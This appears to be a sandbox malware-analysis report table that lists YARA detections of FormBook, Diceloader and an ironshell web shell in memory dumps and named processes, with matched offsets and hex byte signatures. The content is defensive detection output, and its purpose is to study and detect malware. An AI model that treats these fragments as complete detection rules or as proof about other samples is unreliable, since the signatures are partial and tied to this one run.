00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1c3649:$a1: E9 92 9D FF FF C3 E8 0x21fed9:$a1: E9 92 9D FF FF C3 E8 0x329971:$a1: E9 92 9D FF FF C3 E8
00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1aa5e1:$a1: 3C 30 50 4F 53 54 74 09 40 0x206e71:$a1: 3C 30 50 4F 53 54 74 09 40 0x310909:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c0f30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x21d7c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x327258:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1aed5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x20b5ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x315087:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1b9c47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x2164d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x31ff6f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1adc98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1adf12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x20a528:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x20a7a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x313fc0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31423a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1b9a45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2162d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x31fd6d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1b9531:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x215dc1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x31f859:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1b9b47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2163d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x31fe6f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1b9cbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x21654f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x31ffe7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1ae92a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x20b1ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x314c52:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1bcba9:$sqlite3step: 68 34 1C 7B E1 0x1bccbc:$sqlite3step: 68 34 1C 7B E1 0x219439:$sqlite3step: 68 34 1C 7B E1 0x21954c:$sqlite3step: 68 34 1C 7B E1 0x322ed1:$sqlite3step: 68 34 1C 7B E1 0x322fe4:$sqlite3step: 68 34 1C 7B E1 0x1bcbd8:$sqlite3text: 68 38 2A 90 C5 0x1bccfd:$sqlite3text: 68 38 2A 90 C5 0x219468:$sqlite3text: 68 38 2A 90 C5 0x21958d:$sqlite3text: 68 38 2A 90 C5 0x322f00:$sqlite3text: 68 38 2A 90 C5 0x323025:$sqlite3text: 68 38 2A 90 C5 0x1bcbeb:$sqlite3blob: 68 53 D8 7F 8C 0x1bcd13:$sqlite3blob: 68 53 D8 7F 8C 0x21947b:$sqlite3blob: 68 53 D8 7F 8C 0x2195a3:$sqlite3blob: 68 53 D8 7F 8C 0x322f13:$sqlite3blob: 68 53 D8 7F 8C 0x32303b:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x7f3649:$a1: E9 92 9D FF FF C3 E8 0x84fed9:$a1: E9 92 9D FF FF C3 E8 0x9799a9:$a1: E9 92 9D FF FF C3 E8
00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7da5e1:$a1: 3C 30 50 4F 53 54 74 09 40 0x836e71:$a1: 3C 30 50 4F 53 54 74 09 40 0x960941:$a1: 3C 30 50 4F 53 54 74 09 40 0x7f0f30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x84d7c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x977290:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7ded5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x83b5ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x9650bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x7e9c47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x8464d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x96ffa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7ddc98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ddf12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x83a528:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x83a7a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x963ff8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x964272:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7e9a45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8462d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x96fda5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7e9531:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x845dc1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x96f891:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x7e9b47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8463d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x96fea7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7e9cbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x84654f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x97001f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7de92a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x83b1ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x964c8a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x7ecba9:$sqlite3step: 68 34 1C 7B E1 0x7eccbc:$sqlite3step: 68 34 1C 7B E1 0x849439:$sqlite3step: 68 34 1C 7B E1 0x84954c:$sqlite3step: 68 34 1C 7B E1 0x972f09:$sqlite3step: 68 34 1C 7B E1 0x97301c:$sqlite3step: 68 34 1C 7B E1 0x7ecbd8:$sqlite3text: 68 38 2A 90 C5 0x7eccfd:$sqlite3text: 68 38 2A 90 C5 0x849468:$sqlite3text: 68 38 2A 90 C5 0x84958d:$sqlite3text: 68 38 2A 90 C5 0x972f38:$sqlite3text: 68 38 2A 90 C5 0x97305d:$sqlite3text: 68 38 2A 90 C5 0x7ecbeb:$sqlite3blob: 68 53 D8 7F 8C 0x7ecd13:$sqlite3blob: 68 53 D8 7F 8C 0x84947b:$sqlite3blob: 68 53 D8 7F 8C 0x8495a3:$sqlite3blob: 68 53 D8 7F 8C 0x972f4b:$sqlite3blob: 68 53 D8 7F 8C 0x973073:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x7f3649:$a1: E9 92 9D FF FF C3 E8 0x84fed9:$a1: E9 92 9D FF FF C3 E8 0x959971:$a1: E9 92 9D FF FF C3 E8
0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7da5e1:$a1: 3C 30 50 4F 53 54 74 09 40 0x836e71:$a1: 3C 30 50 4F 53 54 74 09 40 0x940909:$a1: 3C 30 50 4F 53 54 74 09 40 0x7f0f30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x84d7c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x957258:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7ded5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x83b5ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x945087:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x7e9c47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x8464d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x94ff6f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7ddc98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ddf12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x83a528:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x83a7a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x943fc0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x94423a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7e9a45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8462d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x94fd6d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7e9531:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x845dc1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x94f859:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x7e9b47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8463d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x94fe6f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7e9cbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x84654f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x94ffe7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7de92a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x83b1ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x944c52:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x7ecba9:$sqlite3step: 68 34 1C 7B E1 0x7eccbc:$sqlite3step: 68 34 1C 7B E1 0x849439:$sqlite3step: 68 34 1C 7B E1 0x84954c:$sqlite3step: 68 34 1C 7B E1 0x952ed1:$sqlite3step: 68 34 1C 7B E1 0x952fe4:$sqlite3step: 68 34 1C 7B E1 0x7ecbd8:$sqlite3text: 68 38 2A 90 C5 0x7eccfd:$sqlite3text: 68 38 2A 90 C5 0x849468:$sqlite3text: 68 38 2A 90 C5 0x84958d:$sqlite3text: 68 38 2A 90 C5 0x952f00:$sqlite3text: 68 38 2A 90 C5 0x953025:$sqlite3text: 68 38 2A 90 C5 0x7ecbeb:$sqlite3blob: 68 53 D8 7F 8C 0x7ecd13:$sqlite3blob: 68 53 D8 7F 8C 0x84947b:$sqlite3blob: 68 53 D8 7F 8C 0x8495a3:$sqlite3blob: 68 53 D8 7F 8C 0x952f13:$sqlite3blob: 68 53 D8 7F 8C 0x95303b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 101 2043 5770 pdf.exe PID: 2720	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7ec2d:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: csc.exe PID: 6324	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x25c9:$a1: 3C 30 50 4F 53 54 74 09 40 0x688d5:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xa01e9:$s2: ~ Shell I 0x1848f5:$s2: ~ Shell I 0x1f82b0:$s2: ~ Shell I 0x2840ee:$s2: ~ Shell I
Process Memory Space: ipconfig.exe PID: 6968	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x262:$a1: 3C 30 50 4F 53 54 74 09 40 0x3a1bd:$a1: 3C 30 50 4F 53 54 74 09 40 0x1523f2:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: 101 2043 5770 pdf.exe PID: 6512	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7e52c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: calc.exe PID: 2300	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x103:$a1: 3C 30 50 4F 53 54 74 09 40
